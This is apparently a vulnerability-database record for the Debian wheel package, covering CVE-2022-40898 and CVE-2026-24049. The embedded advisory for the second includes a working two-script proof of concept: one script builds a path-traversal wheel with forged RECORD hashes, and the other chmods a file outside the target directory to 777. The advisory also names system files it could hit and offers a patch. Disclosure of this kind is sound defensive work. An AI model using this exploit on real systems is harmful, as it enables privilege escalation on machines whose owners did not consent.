Lookup for vulnerable packages by Package URL.

Purlpkg:deb/debian/wheel@0.34.2-1?distro=trixie
Typedeb
Namespacedebian
Namewheel
Version0.34.2-1
Qualifiers
distro trixie
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version0.38.0-1
Latest_non_vulnerable_version0.47.0-1
Affected_by_vulnerabilities
0
url VCID-12sa-qzjz-2ya9
vulnerability_id VCID-12sa-qzjz-2ya9
summary An issue discovered in Python Packaging Authority (PyPA) Wheel 0.37.1 and earlier allows remote attackers to cause a denial of service via attacker controlled input to wheel cli.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-40898.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-40898.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-40898
reference_id
reference_type
scores
0
value 0.00162
scoring_system epss
scoring_elements 0.37045
published_at 2026-04-21T12:55:00Z
1
value 0.00162
scoring_system epss
scoring_elements 0.37101
published_at 2026-04-18T12:55:00Z
2
value 0.00162
scoring_system epss
scoring_elements 0.37119
published_at 2026-04-16T12:55:00Z
3
value 0.00162
scoring_system epss
scoring_elements 0.37073
published_at 2026-04-13T12:55:00Z
4
value 0.00162
scoring_system epss
scoring_elements 0.371
published_at 2026-04-12T12:55:00Z
5
value 0.00162
scoring_system epss
scoring_elements 0.37134
published_at 2026-04-11T12:55:00Z
6
value 0.00162
scoring_system epss
scoring_elements 0.37124
published_at 2026-04-09T12:55:00Z
7
value 0.00162
scoring_system epss
scoring_elements 0.3711
published_at 2026-04-08T12:55:00Z
8
value 0.00162
scoring_system epss
scoring_elements 0.37059
published_at 2026-04-07T12:55:00Z
9
value 0.00162
scoring_system epss
scoring_elements 0.37228
published_at 2026-04-04T12:55:00Z
10
value 0.00162
scoring_system epss
scoring_elements 0.37199
published_at 2026-04-02T12:55:00Z
11
value 0.00172
scoring_system epss
scoring_elements 0.38382
published_at 2026-04-26T12:55:00Z
12
value 0.00172
scoring_system epss
scoring_elements 0.38407
published_at 2026-04-24T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-40898
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40898
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40898
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/wheel/PYSEC-2022-43017.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/wheel/PYSEC-2022-43017.yaml
5
reference_url https://github.com/pypa/wheel
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/wheel
6
reference_url https://github.com/pypa/wheel/blob/main/src/wheel/wheelfile.py#L18
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-15T15:53:45Z/
url https://github.com/pypa/wheel/blob/main/src/wheel/wheelfile.py#L18
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-40898
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-40898
8
reference_url https://pypi.org/project/wheel
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://pypi.org/project/wheel
9
reference_url https://pypi.org/project/wheel/
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-15T15:53:45Z/
url https://pypi.org/project/wheel/
10
reference_url https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages
11
reference_url https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-15T15:53:45Z/
url https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/
12
reference_url https://pyup.io/vulnerabilities/CVE-2022-40898/51499
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://pyup.io/vulnerabilities/CVE-2022-40898/51499
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2165864
reference_id 2165864
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2165864
14
reference_url https://github.com/advisories/GHSA-qwmp-2cf2-g9g6
reference_id GHSA-qwmp-2cf2-g9g6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qwmp-2cf2-g9g6
15
reference_url https://access.redhat.com/errata/RHSA-2023:6712
reference_id RHSA-2023:6712
reference_type
scores
url https://access.redhat.com/errata/RHSA-2023:6712
16
reference_url https://access.redhat.com/errata/RHSA-2023:6793
reference_id RHSA-2023:6793
reference_type
scores
url https://access.redhat.com/errata/RHSA-2023:6793
17
reference_url https://access.redhat.com/errata/RHSA-2024:10761
reference_id RHSA-2024:10761
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:10761
18
reference_url https://usn.ubuntu.com/5821-1/
reference_id USN-5821-1
reference_type
scores
url https://usn.ubuntu.com/5821-1/
19
reference_url https://usn.ubuntu.com/5821-3/
reference_id USN-5821-3
reference_type
scores
url https://usn.ubuntu.com/5821-3/
20
reference_url https://usn.ubuntu.com/USN-5821-2/
reference_id USN-USN-5821-2
reference_type
scores
url https://usn.ubuntu.com/USN-5821-2/
fixed_packages
0
url pkg:deb/debian/wheel@0.38.0-1?distro=trixie
purl pkg:deb/debian/wheel@0.38.0-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.38.0-1%3Fdistro=trixie
1
url pkg:deb/debian/wheel@0.38.4-2?distro=trixie
purl pkg:deb/debian/wheel@0.38.4-2?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.38.4-2%3Fdistro=trixie
2
url pkg:deb/debian/wheel@0.46.1-2?distro=trixie
purl pkg:deb/debian/wheel@0.46.1-2?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fm8w-bycx-4yex
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.46.1-2%3Fdistro=trixie
3
url pkg:deb/debian/wheel@0.46.3-2?distro=trixie
purl pkg:deb/debian/wheel@0.46.3-2?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.46.3-2%3Fdistro=trixie
4
url pkg:deb/debian/wheel@0.47.0-1?distro=trixie
purl pkg:deb/debian/wheel@0.47.0-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.47.0-1%3Fdistro=trixie
aliases CVE-2022-40898, GHSA-qwmp-2cf2-g9g6, PYSEC-2022-43017
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-12sa-qzjz-2ya9
Fixing_vulnerabilities
0
url VCID-fm8w-bycx-4yex
vulnerability_id VCID-fm8w-bycx-4yex
summary
Wheel Affected by Arbitrary File Permission Modification via Path Traversal in wheel unpack
### Summary
 - **Vulnerability Type:** Path Traversal (CWE-22) leading to Arbitrary File Permission Modification.  
 - **Root Cause Component:** wheel.cli.unpack.unpack function.  
 - **Affected Packages:**  
   1. wheel (Upstream source)  
   2. setuptools (Downstream, vendors wheel)  
 - **Severity:** High (Allows modifying system file permissions).  

### Details  
The vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path.  
```
# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)
for zinfo in wf.filelist:
    wf.extract(zinfo, destination)  # (1) Extraction is handled safely by zipfile

    # (2) VULNERABILITY:
    # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.
    # If zinfo.filename contains "../", this targets files outside the destination.
    permissions = zinfo.external_attr >> 16 & 0o777
    destination.joinpath(zinfo.filename).chmod(permissions)
```  

### PoC  
I have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack.  

**Prerequisites:** pip install setuptools  

**Step 1: Generate the Malicious Wheel (gen_poc.py)**  
This script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list.  
```
import zipfile
import hashlib
import base64
import os

def urlsafe_b64encode(data):
    """
    Helper function to encode data using URL-safe Base64 without padding.
    Required by the Wheel file format specification.
    """
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')

def get_hash_and_size(data_bytes):
    """
    Calculates SHA-256 hash and size of the data.
    These values are required to construct a valid 'RECORD' file,
    which is used by the 'wheel' library to verify integrity.
    """
    digest = hashlib.sha256(data_bytes).digest()
    hash_str = "sha256=" + urlsafe_b64encode(digest)
    return hash_str, str(len(data_bytes))

def create_evil_wheel_v4(filename="evil-1.0-py3-none-any.whl"):
    print(f"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}")

    # 1. Prepare Standard Metadata Content
    # These are minimal required contents to make the wheel look legitimate.
    wheel_content = b"Wheel-Version: 1.0\nGenerator: bdist_wheel (0.37.1)\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
    metadata_content = b"Metadata-Version: 2.1\nName: evil\nVersion: 1.0\nSummary: PoC Package\n"
   
    # 2. Define Malicious Payload (Path Traversal)
    # The content doesn't matter, but the path does.
    payload_content = b"PWNED by Path Traversal"

    # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../'
    # The vulnerability allows 'chmod' to affect this path directly.
    malicious_path = "../../poc_target.txt"

    # 3. Calculate Hashes for Integrity Check Bypass
    # The 'wheel' library verifies if the file hash matches the RECORD entry.
    # To bypass this check, we calculate the correct hash for our malicious file.
    wheel_hash, wheel_size = get_hash_and_size(wheel_content)
    metadata_hash, metadata_size = get_hash_and_size(metadata_content)
    payload_hash, payload_size = get_hash_and_size(payload_content)

    # 4. Construct the 'RECORD' File
    # The RECORD file lists all files in the wheel with their hashes.
    # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here.
    # This tricks the 'wheel' library into treating the malicious file as a valid, verified component.
    record_lines = [
        f"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}",
        f"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}",
        f"{malicious_path},{payload_hash},{payload_size}",  # <-- Authenticating the malicious path
        "evil-1.0.dist-info/RECORD,,"
    ]
    record_content = "\n".join(record_lines).encode('utf-8')

    # 5. Build the Zip File
    with zipfile.ZipFile(filename, "w") as zf:
        # Write standard metadata files
        zf.writestr("evil-1.0.dist-info/WHEEL", wheel_content)
        zf.writestr("evil-1.0.dist-info/METADATA", metadata_content)
        zf.writestr("evil-1.0.dist-info/RECORD", record_content)

        # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file
        # We need to set specific permission bits to trigger the vulnerability.
        zinfo = zipfile.ZipInfo(malicious_path)
       
        # Set external attributes to 0o777 (rwxrwxrwx)
        # Upper 16 bits: File type (0o100000 = Regular File)
        # Lower 16 bits: Permissions (0o777 = World Writable)
        # The vulnerable 'unpack' function will blindly apply this '777' to the system file.
        zinfo.external_attr = (0o100000 | 0o777) << 16
       
        zf.writestr(zinfo, payload_content)

    print("[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.")

if __name__ == "__main__":
    create_evil_wheel_v4()
```  

**Step 2: Run the Exploit (exploit.py)**  
```
from pathlib import Path
import sys

# Demonstrating impact on setuptools
try:
    from setuptools._vendor.wheel.cli.unpack import unpack
    print("[*] Loaded unpack from setuptools")
except ImportError:
    from wheel.cli.unpack import unpack
    print("[*] Loaded unpack from wheel")

# 1. Setup Target (Read-Only system file simulation)
target = Path("poc_target.txt")
target.write_text("SENSITIVE CONFIG")
target.chmod(0o400) # Read-only
print(f"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}")

# 2. Run Vulnerable Unpack
# The wheel contains "../../poc_target.txt".
# unpack() will extract safely, BUT chmod() will hit the actual target file.
try:
    unpack("evil-1.0-py3-none-any.whl", "unpack_dest")
except Exception as e:
    print(f"[!] Ignored expected extraction error: {e}")

# 3. Check Result
final_perms = oct(target.stat().st_mode)[-3:]
print(f"[*] Final Perms: {final_perms}")

if final_perms == "777":
    print("VULNERABILITY CONFIRMED: Target file is now world-writable (777)!")
else:
    print("[-] Attack failed.")
```  

**result:**  
<img width="806" height="838" alt="image" src="https://github.com/user-attachments/assets/f750eb3b-36ea-445c-b7f4-15c14eb188db" />  
  
### Impact  
Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.  

### Recommended Fix  
The unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract().  

### Suggested Patch:  
```
# extract() returns the actual path where the file was written
extracted_path = wf.extract(zinfo, destination)

# Only apply chmod if a file was actually written
if extracted_path:
    permissions = zinfo.external_attr >> 16 & 0o777
    Path(extracted_path).chmod(permissions)
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24049.json
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24049.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-24049
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.01943
published_at 2026-04-26T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.01948
published_at 2026-04-24T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.01961
published_at 2026-04-21T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.01875
published_at 2026-04-18T12:55:00Z
4
value 0.00013
scoring_system epss
scoring_elements 0.01877
published_at 2026-04-16T12:55:00Z
5
value 0.00013
scoring_system epss
scoring_elements 0.01905
published_at 2026-04-02T12:55:00Z
6
value 0.00013
scoring_system epss
scoring_elements 0.01901
published_at 2026-04-12T12:55:00Z
7
value 0.00013
scoring_system epss
scoring_elements 0.01933
published_at 2026-04-09T12:55:00Z
8
value 0.00013
scoring_system epss
scoring_elements 0.01919
published_at 2026-04-08T12:55:00Z
9
value 0.00013
scoring_system epss
scoring_elements 0.01917
published_at 2026-04-11T12:55:00Z
10
value 0.00013
scoring_system epss
scoring_elements 0.01918
published_at 2026-04-04T12:55:00Z
11
value 0.00013
scoring_system epss
scoring_elements 0.01896
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-24049
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/pypa/wheel
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/wheel
4
reference_url https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/
url https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef
5
reference_url https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e
6
reference_url https://github.com/pypa/wheel/releases/tag/0.46.2
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/
url https://github.com/pypa/wheel/releases/tag/0.46.2
7
reference_url https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/
url https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-24049
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-24049
9
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126274
reference_id 1126274
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126274
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2431959
reference_id 2431959
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2431959
11
reference_url https://github.com/advisories/GHSA-8rrh-rw8j-w5fx
reference_id GHSA-8rrh-rw8j-w5fx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8rrh-rw8j-w5fx
12
reference_url https://access.redhat.com/errata/RHSA-2026:10184
reference_id RHSA-2026:10184
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:10184
13
reference_url https://access.redhat.com/errata/RHSA-2026:1504
reference_id RHSA-2026:1504
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1504
14
reference_url https://access.redhat.com/errata/RHSA-2026:1902
reference_id RHSA-2026:1902
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1902
15
reference_url https://access.redhat.com/errata/RHSA-2026:1939
reference_id RHSA-2026:1939
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1939
16
reference_url https://access.redhat.com/errata/RHSA-2026:1942
reference_id RHSA-2026:1942
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1942
17
reference_url https://access.redhat.com/errata/RHSA-2026:2090
reference_id RHSA-2026:2090
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2090
18
reference_url https://access.redhat.com/errata/RHSA-2026:2106
reference_id RHSA-2026:2106
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2106
19
reference_url https://access.redhat.com/errata/RHSA-2026:2139
reference_id RHSA-2026:2139
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2139
20
reference_url https://access.redhat.com/errata/RHSA-2026:2675
reference_id RHSA-2026:2675
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2675
21
reference_url https://access.redhat.com/errata/RHSA-2026:2681
reference_id RHSA-2026:2681
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2681
22
reference_url https://access.redhat.com/errata/RHSA-2026:2694
reference_id RHSA-2026:2694
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2694
23
reference_url https://access.redhat.com/errata/RHSA-2026:2695
reference_id RHSA-2026:2695
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2695
24
reference_url https://access.redhat.com/errata/RHSA-2026:2710
reference_id RHSA-2026:2710
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2710
25
reference_url https://access.redhat.com/errata/RHSA-2026:2754
reference_id RHSA-2026:2754
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2754
26
reference_url https://access.redhat.com/errata/RHSA-2026:2762
reference_id RHSA-2026:2762
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2762
27
reference_url https://access.redhat.com/errata/RHSA-2026:2823
reference_id RHSA-2026:2823
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2823
28
reference_url https://access.redhat.com/errata/RHSA-2026:2865
reference_id RHSA-2026:2865
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2865
29
reference_url https://access.redhat.com/errata/RHSA-2026:2866
reference_id RHSA-2026:2866
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2866
30
reference_url https://access.redhat.com/errata/RHSA-2026:2900
reference_id RHSA-2026:2900
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2900
31
reference_url https://access.redhat.com/errata/RHSA-2026:2925
reference_id RHSA-2026:2925
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2925
32
reference_url https://access.redhat.com/errata/RHSA-2026:3461
reference_id RHSA-2026:3461
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3461
33
reference_url https://access.redhat.com/errata/RHSA-2026:3462
reference_id RHSA-2026:3462
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3462
34
reference_url https://access.redhat.com/errata/RHSA-2026:3713
reference_id RHSA-2026:3713
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3713
35
reference_url https://access.redhat.com/errata/RHSA-2026:3782
reference_id RHSA-2026:3782
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3782
36
reference_url https://access.redhat.com/errata/RHSA-2026:3958
reference_id RHSA-2026:3958
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3958
37
reference_url https://access.redhat.com/errata/RHSA-2026:3959
reference_id RHSA-2026:3959
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3959
38
reference_url https://access.redhat.com/errata/RHSA-2026:3960
reference_id RHSA-2026:3960
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3960
39
reference_url https://access.redhat.com/errata/RHSA-2026:4185
reference_id RHSA-2026:4185
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4185
40
reference_url https://access.redhat.com/errata/RHSA-2026:4215
reference_id RHSA-2026:4215
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4215
41
reference_url https://access.redhat.com/errata/RHSA-2026:4271
reference_id RHSA-2026:4271
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4271
42
reference_url https://access.redhat.com/errata/RHSA-2026:4942
reference_id RHSA-2026:4942
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4942
43
reference_url https://access.redhat.com/errata/RHSA-2026:5119
reference_id RHSA-2026:5119
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5119
44
reference_url https://access.redhat.com/errata/RHSA-2026:6192
reference_id RHSA-2026:6192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6192
45
reference_url https://access.redhat.com/errata/RHSA-2026:6555
reference_id RHSA-2026:6555
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6555
46
reference_url https://access.redhat.com/errata/RHSA-2026:6562
reference_id RHSA-2026:6562
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6562
47
reference_url https://access.redhat.com/errata/RHSA-2026:6565
reference_id RHSA-2026:6565
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6565
48
reference_url https://access.redhat.com/errata/RHSA-2026:7250
reference_id RHSA-2026:7250
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:7250
fixed_packages
0
url pkg:deb/debian/wheel@0?distro=trixie
purl pkg:deb/debian/wheel@0?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0%3Fdistro=trixie
1
url pkg:deb/debian/wheel@0.34.2-1?distro=trixie
purl pkg:deb/debian/wheel@0.34.2-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-12sa-qzjz-2ya9
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.34.2-1%3Fdistro=trixie
2
url pkg:deb/debian/wheel@0.38.4-2?distro=trixie
purl pkg:deb/debian/wheel@0.38.4-2?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.38.4-2%3Fdistro=trixie
3
url pkg:deb/debian/wheel@0.46.3-1?distro=trixie
purl pkg:deb/debian/wheel@0.46.3-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.46.3-1%3Fdistro=trixie
4
url pkg:deb/debian/wheel@0.46.3-2?distro=trixie
purl pkg:deb/debian/wheel@0.46.3-2?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.46.3-2%3Fdistro=trixie
5
url pkg:deb/debian/wheel@0.47.0-1?distro=trixie
purl pkg:deb/debian/wheel@0.47.0-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.47.0-1%3Fdistro=trixie
aliases CVE-2026-24049, GHSA-8rrh-rw8j-w5fx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fm8w-bycx-4yex
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:deb/debian/wheel@0.34.2-1%3Fdistro=trixie